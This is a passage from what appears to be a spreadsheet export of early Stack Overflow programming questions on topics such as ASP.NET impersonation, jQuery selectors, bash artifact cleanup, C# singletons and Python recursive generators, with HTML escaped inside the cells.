&lt;p&gt;We just got the error briefly on a site that was left using &lt;code&gt;mod_jk&lt;/code&gt;, while a sister site on the same server using &lt;code&gt;mod_proxy_ajp&lt;/code&gt; didn't show the error. This doesn't prove anything, but it does provide evidence that swithing to &lt;code&gt;mod_proxy_ajp&lt;/code&gt; may have helped.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We just got the error again last night on a site using &lt;code&gt;mod_proxy_ajp&lt;/code&gt;, so clearly that hasn't solved it - &lt;code&gt;mod_jk&lt;/code&gt; wasn't the source of the problem. I'm going to try the anonymous suggestion of turning off persistent connections:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;KeepAlive Off
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If that fails as well, I'm going to be desperate enough to start investigating GlassFish.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Dammit! The problem just came back. I hadn't seen it in a while, so I was starting to think we'd finally sorted it. I hate heisenbugs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement a singleton in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I implement the singleton pattern in C#? I want to put my constants and some basic functions in it as I use those everywhere in my project.  I want to have them 'Global' and not need to manually bind them every object I create.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I tag a database component in UML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an UML component diagram, how does one tag or identify a component as a database, so that it's easily recognizable? In the old days there was the cylinder symbol for showing database but that's not part of the UML. Same goes for an application server for instance, how would that be shown?&lt;/p&gt;
&lt;p&gt;Are stereotypes applicable here? Can the component symbol be enhanced with graphical elements?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Team foundation and 64-bit windows, can't install?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So is it a certified answer that you can't install Team foundation on windows 2008 64-bit?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Is it better just do install it on windows 2003 or 2008?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Menu Parent Menu Item Highlighting on Hover when Flyouts are enabled</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ASP.Net Menu Control with three levels and flyouts enabled.
I want to highlight the parent items (right upto the top level parent) whenever a user hovers over the menu items.&lt;/p&gt;
&lt;p&gt;I do not want to use a client side solution as described here:
&lt;a href="http://www.codeproject.com/KB/webforms/AspMenuParentHighlighting.aspx" rel="nofollow"&gt;http://www.codeproject.com/KB/webforms/AspMenuParentHighlighting.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is there an elegant server side solution?&lt;/p&gt;
&lt;p&gt;Kind regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008 Express: How to save as UTF-8 all files by default?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to make Visual Studio 2008 Express store all the files as UTF-8 by default?&lt;/p&gt;
&lt;p&gt;Thanks for your time.
Best regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Simple" SQL Query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Each of my clients can have many todo items and every todo item has a due date.&lt;/p&gt;
&lt;p&gt;What would be the query for discovering the next undone todo item by due date for each file?  In the event that a client has more than one todo, the one with the lowest id is the correct one.&lt;/p&gt;
&lt;p&gt;Assuming the following minimal schema:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;clients (id, name)
todos (id, client_id, description, timestamp_due, timestamp_completed)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bookmarked page redirect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently converted a site from asp to CF.  Unfortunately, alot of the old users had the "homepage" bookmarked.  www.example.com/homepage.asp&lt;/p&gt;
&lt;p&gt;Is there a sort of catch all way I could redirect any traffic from that page to the current index.cfm?&lt;/p&gt;
&lt;p&gt;I would normally just delete those files, but the owner(s) wanted to keep it around for their own comparison reasons.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any difference between a GUID and a UUID?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I see these 2 acronyms thrown around, and I was wondering if there are any differences between a GUID and a UUID?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to debug ORA-01775: looping chain of synonyms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm familiar with the issue behind ORA-01775: looping chain of synonyms, but is there any trick to debugging it, or do I just have to "create or replace" my way out of it?  &lt;/p&gt;
&lt;p&gt;Is there a way to query the schema or whatever to find out what the current definition of a public synonym is?  &lt;/p&gt;
&lt;p&gt;Even more awesome would be a graphical tool, but at this point, anything would be helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for suggestions for building a secure REST API within Ruby on Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting started on building a REST API for a project I'm working on, and it led me to do a little research as to the best way to build an API using RoR. I find out pretty quickly that by default, models are open to the world and can be called via URL by simply putting a ".xml" at the end of the URL and passing appropriate parameters.&lt;/p&gt;
&lt;p&gt;So then the next question came. How do I secure my app to prevent unauthorized changes? In doing some research I found a couple articles talking about &lt;code&gt;attr_accessible&lt;/code&gt; and &lt;code&gt;attr_protected&lt;/code&gt; and how they can be used. The particular URL I found talking about these was posted back in May of '07 (&lt;a href="http://railscasts.com/episodes/26-hackers-love-mass-assignment"&gt;here&lt;/a&gt;). &lt;/p&gt;
&lt;p&gt;As with all things ruby, I'm sure that things have evolved since then. So my question is, is this still the best way to secure a REST API within RoR?&lt;/p&gt;
&lt;p&gt;If not what do you suggest in either a "new project" or an "existing project"scenario?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Load multiple external websites into one webpage via re-using ONE IFrame + Ajax</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to embed multiple external websites into one web page.  Using an IFRAME works ok, but once you get past 10 embedded iframes, the memory fottprint starts to get too big.&lt;/p&gt;
&lt;p&gt;So I was thinking, is it possible via ajax/javascript, to re-use the same iframe to load the collection of websites one after enother, and display the results in a div on the main webpage?  Or is this explicitly blocked for security reasons?&lt;/p&gt;
&lt;p&gt;EDIT:  I don't want to go the screen scraping route, as I was planning to make this a semi public site, and I don't want to incur all the bandwidth on my server and would rather have that done on the client, if it is possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When using keytool to generate a CSR file, does it have to be generated on the hosting server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was under the impression that I could run it on any machine, but a guy from our hosting company is saying that the csr has to be generated on the server hosting the site.&lt;/p&gt;
&lt;p&gt;Can anyone clear this one up for me?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to (de)serialise JSON data in Silverlight using a different name to member variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following members defined in a class that I'm trying to deserialise:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[DataMemberAttribute(Name = "cust_title")]
    	public String Title { get; set; }
    	[DataMemberAttribute(Name = "cust_description")]
    	public String Description { get; set; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For some reason, the deserialisation fails (it seems to ignore the DataMemberAttribute).&lt;/p&gt;
&lt;p&gt;Does anyone know how to get this working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Available Build Tools (make, etc)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's a lot of questions on here regarding various niche build needs (.NET, continuous integration, etc) but, of course, my niche need is different.&lt;/p&gt;
&lt;p&gt;Rather than asking a very specific question right now, I'd like a survey of available build tools (such as make, ant, etc) so I can ask a follow up question more intelligently if needed.&lt;/p&gt;
&lt;p&gt;In your answer, please include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ONE&lt;/strong&gt; build tool&lt;/li&gt;
&lt;li&gt;Link to the main page about that tool&lt;/li&gt;
&lt;li&gt;If you know some pros and cons (ie, runs on windows with cygwin, or .NET specific, etc) then list some (not required - the name and link are required)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your build tool is already in an answer, comment on it adding pros/cons/limitations/experiences.  Feel free to add as many answers as you like as long as they don't already exist - but don't put several build tools into one answer.&lt;/p&gt;
&lt;p&gt;Please be aware that if you duplicate answers you may be downvoted - add additional information about a given build in the comments.  Ideally these comments will be incorporated into the answer over time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Matlab copy constructor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a better way to implement copy construcor for matlab for a handle derived class other than adding a constructor with one input and explicitly copying its properties?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;obj.property1 = from.property1;  
obj.property2 = from.property2;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc.&lt;/p&gt;
&lt;p&gt;Thanks,
Dani&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Images &amp; Hyperlink Borders - Ghost 1px x 1px Border</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've an image that is wrapped in an anchor tag that, through jQuery, triggers an action somewhere else on the page.  When I click on the image, two tiny 1px by 1px boxes show up in the upper and lower left corners of the image.&lt;/p&gt;
&lt;p&gt;My CSS styles explicitly state no borders for images: &lt;code&gt;a,img { border: 0; }&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;It also seems to only happen in Firefox 3. Anyone else had this issue?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Here's a screenshot of the left part of the image (the graphic has a white background):&lt;/p&gt;
&lt;p&gt;&lt;img src="http://neezer.net/img/ss.png" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;It's not the background, or the border of any other element. I checked.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET aspx page code runs impersonated though impersonation is disabled</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a blank test app created in VS 2005 as ASP.NET application. &lt;a href="http://msdn.microsoft.com/en-us/library/ms998351.aspx" rel="nofollow"&gt;MSDN says&lt;/a&gt; that &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;By default, ASP.NET does not use impersonation, and your code runs using the ASP.NET application's process identity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And I have the following web.config&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;configuration&amp;gt;
    &amp;lt;appSettings/&amp;gt;
    &amp;lt;connectionStrings/&amp;gt;
    &amp;lt;system.web&amp;gt;
        &amp;lt;!-- 
            Set compilation debug="true" to insert debugging 
            symbols into the compiled page. Because this 
            affects performance, set this value to true only 
            during development.
        --&amp;gt;
        &amp;lt;compilation debug="true" defaultLanguage="c#" /&amp;gt;
        &amp;lt;!--
            The &amp;lt;authentication&amp;gt; section enables configuration 
            of the security authentication mode used by 
            ASP.NET to identify an incoming user. 
        --&amp;gt;
        &amp;lt;authentication mode="Windows"/&amp;gt;
        &amp;lt;identity impersonate="false"/&amp;gt;
        &amp;lt;!--
            The &amp;lt;customErrors&amp;gt; section enables configuration 
            of what to do if/when an unhandled error occurs 
            during the execution of a request. Specifically, 
            it enables developers to configure html error pages 
            to be displayed in place of a error stack trace.
        &amp;lt;customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm"&amp;gt;
            &amp;lt;error statusCode="403" redirect="NoAccess.htm" /&amp;gt;
            &amp;lt;error statusCode="404" redirect="FileNotFound.htm" /&amp;gt;
        &amp;lt;/customErrors&amp;gt;
        --&amp;gt;
    &amp;lt;/system.web&amp;gt;
&amp;lt;/configuration&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it seem impersonation is disabled just like &lt;a href="http://msdn.microsoft.com/en-us/library/ms998351.aspx" rel="nofollow"&gt;the article&lt;/a&gt; is suggesting.&lt;/p&gt;
&lt;p&gt;My aspx is blank default and the codebehind is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace TestWebapp
{
    public partial class _Default : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            System.Diagnostics.Debug.WriteLine(String.Format("Before1: Current Princupal = {0}", Thread.CurrentPrincipal.Identity.Name));
            WindowsImpersonationContext ctx = WindowsIdentity.Impersonate(IntPtr.Zero);
            try
            {
                int a = 0;
                System.Diagnostics.Debug.WriteLine(String.Format("After: Current Princupal = {0}", Thread.CurrentPrincipal.Identity.Name));
            } finally
            {
                ctx.Undo();
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I reload the page I get the following debug output:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[5288] Before1: Current Princupal =
  DOMAIN\User
  [5288] After: Current Princupal =
  DOMAIN\User&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Output is the same with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;identity impersonate="false"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The web site uses Default Application Pool and the pool is set up to use NETWORK SERVICE account for its worker processes.
I'm sure the application uses the web.config it should use and the w3p.exe worker process is running under NETWORK SERVICE.&lt;/p&gt;
&lt;p&gt;What can be wrong in this case?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;@Edit: Rob, thanks for the tip! 
The $user shortcut shows me that everything is happening as I expect: with impersonation on I have the process running user NT AUTHORITY\NETWORK SERVICE    and the thread has DOMAIN\User before WindowsIdentity.Impersonate(IntPtr.Zero) and "No Token. Thread not impersonating." after.
But Thread.CurrentPrincipal.Identity.Name and HttpContext.Current.User.Identity.Name still give me DOMAIN\User in both places.&lt;/p&gt;
&lt;p&gt;@Edit: I've found out that to get Thread.CurrentPrincipal and HttpContext.Current.User changed I have to manually do it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Thread.CurrentPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
HttpContext.Current.User = Thread.CurrentPrincipal;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not sure what's the point here, but anyway. I now have a problem with sharepoint shared services manage user profile permission but that's another question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieving python module path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to detect whether module has changed. Now, using inotify is simple, you just need to know the directory you want to get notifications from.&lt;/p&gt;
&lt;p&gt;How do I retrieve a module's path in python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Override Default Constructor of Partial Class with Another Partial Class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't think this is possible, but if is then I need it :)&lt;/p&gt;
&lt;p&gt;I have a auto-generated proxy file from the wsdl.exe command line tool by Visual Studio 2008.&lt;/p&gt;
&lt;p&gt;The proxy output is partial classes. I want to override the default constructor that is generated. I would rather not modify the code since it is auto-generated.&lt;/p&gt;
&lt;p&gt;I tried making another partial class and redefining the default constructor, but that doesn't work. I then tried using the override and new keywords, but that doesn't work.&lt;/p&gt;
&lt;p&gt;I know I could inherit from the partial class, but that would mean I'd have to change all of our source code to point to the new parent class. I would rather not have to do this.&lt;/p&gt;
&lt;p&gt;Any ideas, work arounds, or hacks? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//Auto-generated class
namespace MyNamespace {
   public partial class MyWebService : System.Web.Services.Protocols.SoapHttpClientProtocol {
      public MyWebService() {
         string myString = "auto-generated constructor";
         //other code...
      }
   }
}
//Manually created class in order to override the default constructor
namespace MyNamespace {
   public partial class MyWebService : System.Web.Services.Protocols.SoapHttpClientProtocol {
      public override MyWebService() { //this doesn't work
         string myString = "overridden constructor";
         //other code...
      }
   }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there a free Visual Studio addin for Nunit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm cheap and don't want to pay for ReSharper or TestDriven.NET, is there a free visual Studio addin for NUnit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lisp DO variable syntax reasoning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Peter Seibel's &lt;em&gt;Practical Common Lisp&lt;/em&gt;, he gives this example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(do ((nums nil) (i 1 (1+ i)))
    ((&amp;gt; i 10) (nreverse nums))
  (push i nums))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can see how it works, using nums inside the loop but not giving it a step-form.  Why would you put nums in the variable-definition rather than do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(let (nums) (do ((i 1 (+ i 1)))
         ((&amp;gt; i 10) (nreverse nums))
       (push i nums)))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm sure there's a good reason, but I don't get it yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using "this" with jQuery Selectors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some HTML that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul class="faq"&amp;gt;
    &amp;lt;li class="open"&amp;gt;
        &amp;lt;a class="question" href=""&amp;gt;This is my question?&amp;lt;/a&amp;gt;
        &amp;lt;p&amp;gt;Of course you can, it will be awesome. &amp;lt;/p&amp;gt;
    &amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using CSS I'm setting the 'p' tag to display:none;. I want to use jQuery to display or hide the 'p' tag when the anchor is clicked, but I'm having some troubles with the sibling selector. &lt;/p&gt;
&lt;p&gt;Just trying to get the selector working, I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("a.question").click(function () {
    $(this + " ~ p").css("background-color", "red");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to test it out. Seemingly, the sibling selector can't really be used like that, and as I'm completely new to jQuery I don't know the appropriate means to make that happen. &lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Config values in DB or File?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some configuration values for an asp.net web app.  They will be maintained by a system admin once the system goes live.  Should I store these values in the database or in a config file?  Is there a best practice for this sort of thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change the locale that JasperReports uses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The windows installed on my machine has the locale &lt;code&gt;en_AU&lt;/code&gt; and that's what JasperReports uses. I already tried changing the locale of all users, including the Administrator but it still uses &lt;code&gt;en_AU&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How can I change that locale? Is it possible to change the &lt;code&gt;REPORT_LOCALE&lt;/code&gt; parameter on my report?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding composite numbers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a range of random numbers.  The range is actually determined by the user but it will be up to 1000 integers.  They are placed in this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;vector&amp;lt;int&amp;gt; n
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the values are inserted like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;srand(1);
for (i = 0; i &amp;lt; n; i++)
  v[i] = rand() % n;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm creating a separate function to find all the non-prime values.  Here is what I have now, but I know it's completely wrong as I get both prime and composite in the series.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void sieve(vector&amp;lt;int&amp;gt; v, int n)
{
  int i,j;
  for(i = 2; i &amp;lt;= n; i++)
     {
        cout &amp;lt;&amp;lt; i &amp;lt;&amp;lt; " % ";
        for(j = 0; j &amp;lt;= n; j++)
           {
              if(i % v[j] == 0)
                 cout &amp;lt;&amp;lt; v[j] &amp;lt;&amp;lt; endl;
           }
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This method typically worked when I just had a series of numbers from 0-1000, but it doesn't seem to be working now when I have numbers out of order and duplicates.  Is there a better method to find non-prime numbers in a vector?  I'm tempted to just create another vector, fill it with n numbers and just find the non-primes that way, but would that be inefficient?&lt;/p&gt;
&lt;p&gt;Okay, since the range is from 0-1000 I am wondering if it's easier to just create vector with  0-n sorted, and then using a sieve to find the primes, is this getting any closer?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void sieve(vector&amp;lt;int&amp;gt; v, BST&amp;lt;int&amp;gt; t, int n)
{
  vector&amp;lt;int&amp;gt; v_nonPrime(n);
  int i,j;
  for(i = 2; i &amp;lt; n; i++)
      v_nonPrime[i] = i;
  for(i = 2; i &amp;lt; n; i++)
     {
        for(j = i + 1; j &amp;lt; n; j++)
           {
              if(v_nonPrime[i] % j == 0)
                 cout &amp;lt;&amp;lt; v_nonPrime[i] &amp;lt;&amp;lt; endl;
           }
     }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are good ways to design or diagram state?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The issue that prompted me to ask this is a web form that was not persisting data the way I expected it to. That's vague, but the point is, what do you like to do to model state, flow of data, and so forth?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bash script, match on dates like?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a script to remove some build artifacts older than 1 week. &lt;/p&gt;
&lt;p&gt;The files have names in the form &lt;em&gt;artifact-1.1-200810391018.exe&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;How do I go about removing only the files that are greater than 1 week old, excluding the time in hours and minutes at the end of the date-time-stamp?&lt;/p&gt;
&lt;p&gt;Currently it is removing all of the files in the directory.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
NIGHTLY_LOCATIONS=( "/foo" "/bar" )
ARTIFACT_PREFIX="artifact-*-"
NUM_TO_KEEP=7
for home in $(seq 0 $((${#NIGHTLY_LOCATIONS[@]} - 1))); do
        echo "Removing artifacts for" ${NIGHTLY_LOCATIONS[$location]}
        for file in `find ${NIGHTLY_LOCATIONS[$location]} -name "$ARTIFACT_PREFIX*"`; do
                keep=true
                for day in $(seq 0 $((${NUM_TO_KEEP} - 1))); do
                        date=`date --date="$day days ago" +%Y%m%d`
                        echo $(basename $file ".exe") " = " $ARTIFACT_PREFIX$date
                        if [ "$(basename $file ".exe")" != "$ARTIFACT_PREFIX$date" ]; then
                                keep=false
                        fi
                done
                if [ !$keep ]; then
                        echo "Removing file"
                        rm -f $file
                fi
        done done
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Netbeans GUI Designer &amp; Fixed-Size Application Panels</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a problem, creating a fixed-size overall panel for a touchscreen GUI application that has to take up the entire screen.  In a nutshell, the touchscreen is 800 x 600 pixels, and therefore I want the main GUI panel to be that size.&lt;/p&gt;
&lt;p&gt;When I start a new GUI project in NetBeans, I set the properties of the main panel for min/max/preferred size to 800 x 600, and the panel within the 'Design' view changes size.  However, when I launch the app, it is resized to the original default size.&lt;/p&gt;
&lt;p&gt;Adding this code after initComponents() does not help:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.mainPanel.setSize(new Dimension(800,600));
this.mainPanel.setMaximumSize(new Dimension(800,600));
this.mainPanel.setMinimumSize(new Dimension(800,600));
this.mainPanel.repaint();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've peeked into all of the resource files and cannot seem to find values that would override these (which seems somewhat impossible anyway, given that I'm setting them after initComponents() does its work).  I'm using the FreeDesign layout, because I wanted complete control over where I put things.&lt;/p&gt;
&lt;p&gt;I suspect the layout manager is resizing things based upon how many widgets I have on the screen, because different prototyped screens come in at differing sizes.  &lt;/p&gt;
&lt;p&gt;Help is appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the concept of shared sessions exist in ASP.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a web application (ASP.NET) game that would consist of a single page, and on that page, there would be a game board akin to Monopoly.  I am trying to determine what the best architectural approach would be.  The main requirements I have identified thus far are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Up to six users share a single game state object.&lt;/li&gt;
&lt;li&gt;The users need to keep (relatively) up to date on the current state of the game, i.e. whose turn it is, what did the active user just roll, how much money does each other user have, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have thought about keeping the game state in a database, but it seems like overkill to keep updating the database when a game state object (say, in a cache) could be kept up to date.  For example, the flow might go like this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Receive request for data from a user.&lt;/li&gt;
&lt;li&gt;Look up data in database.  Create object from that data.&lt;/li&gt;
&lt;li&gt;Verify user has permissions to perform request based on the game's state (i.e. make sure it's really their turn or have enough money to buy that property).&lt;/li&gt;
&lt;li&gt;Update the game object.&lt;/li&gt;
&lt;li&gt;Write the game object back to the database.&lt;/li&gt;
&lt;li&gt;Repeat for every single request.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;em&gt;Consider that a single server would be serving several concurrent games.&lt;/em&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I have thought about using AJAX to make requests to an an ASP.NET page.&lt;br&gt;&lt;/li&gt;
&lt;li&gt;I have thought about using AJAX requests to a web service using silverlight.&lt;br&gt;&lt;/li&gt;
&lt;li&gt;I have thought about using WCF duplex channels in silverlight.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I can't figure out what the best approach is.  All seem to have their drawbacks.  Does anyone out there have experience with this sort of thing and care to share those experiences?  Feel free to ask your own questions if I am being too ambiguous!  Thanks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:  Does anyone have any suggestions for how to implement this connection to the server based on the three options I mention above?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there something between a normal user account and root?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an application that manages network interfaces on behalf of the user and it calls out to several external programs (such as ifconfig) that requires root to make changes. (Specifically, changing the IP address of a local interface, etc.) During development, I have been running the IDE as root (ugh) and the debugger as root (double-ugh). Is there a nice way for the end-user to run these under a non-root account? I strongly dislike the size of the attack surface presented by GTK, wxPython, Python, and my application when it runs as root.&lt;/p&gt;
&lt;p&gt;I have looked into capabilities, but they look half-baked and I'm not sure if I'd be able to use them in Python, especially if they are on a thread basis. The only option I haven't explored is a daemon that has the setuid bit set and does all the root-type stuff on behalf of the UI. I'm hesitant to introduce that complexity this early in the project, as running as root is not a dealbreaker for the users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB6 Editor changing case of variable names!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not much of a Visual Basic person, but I am tasked with maintaining an old VB6 app.  Whenever I check out a file, the editor will replace a bunch of the uppercase variable names with lowercase automatically.  How can I make this stop!?  I don't want to have to change them all back, and it's a pain to have these changes show up in SourceSafe "Differences" when I'm trying to locate the REAL differences.&lt;/p&gt;
&lt;p&gt;It is changing it automatically in the definition, too:
Dim C as Control becomes Dim c as Control.  Dim X&amp;amp; becomes Dim x&amp;amp;.  But it doesn't do it all the time; for example, three lines down from Dim x&amp;amp;, there's a Dim Y&amp;amp;, uppercase, which it did not change.  Why's it do this to me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I enable set the timeout on file uploads in SWF to greater than 3 min?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using SWFUpload to handle file uploads and have run into a problem where any file upload &gt;= 3 min will time out. As far as I can tell, Apache and PHP are configured properly to handle large files. Are there any settings with Flash that might affect this? Does Flash have some sort of timeout value I could change?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python: using a recursive algorithm as a generator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I wrote a function to generate certain sequences with nontrivial constraints. The problem came with a natural recursive solution. Now it happens that, even for relatively small input, the sequences are several thousands, thus I would prefer to use my algorithm as a generator instead of using it to fill a list with all the sequences.&lt;/p&gt;
&lt;p&gt;Here is an example. Suppose we want to compute all the permutations of a string with a recursive function. The following naive algorithm takes an extra argument 'storage' and appends a permutation to it whenever it finds one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def getPermutations(string, storage, prefix=""):
   if len(string) == 1:
      storage.append(prefix + string)   # &amp;lt;-----
   else:
      for i in range(len(string)):
         getPermutations(string[:i]+string[i+1:], storage, prefix+string[i])
storage = []
getPermutations("abcd", storage)
for permutation in storage: print permutation
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(Please don't care about inefficiency, this is only an example.)&lt;/p&gt;
&lt;p&gt;Now I want to turn my function into a generator, i.e. to yield a permutation instead of appending it to the storage list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def getPermutations(string, prefix=""):
   if len(string) == 1:
      yield prefix + string             # &amp;lt;-----
   else:
      for i in range(len(string)):
         getPermutations(string[:i]+string[i+1:], prefix+string[i])
for permutation in getPermutations("abcd"):
   print permutation
&lt;/code&gt;&lt;/pre&gt;
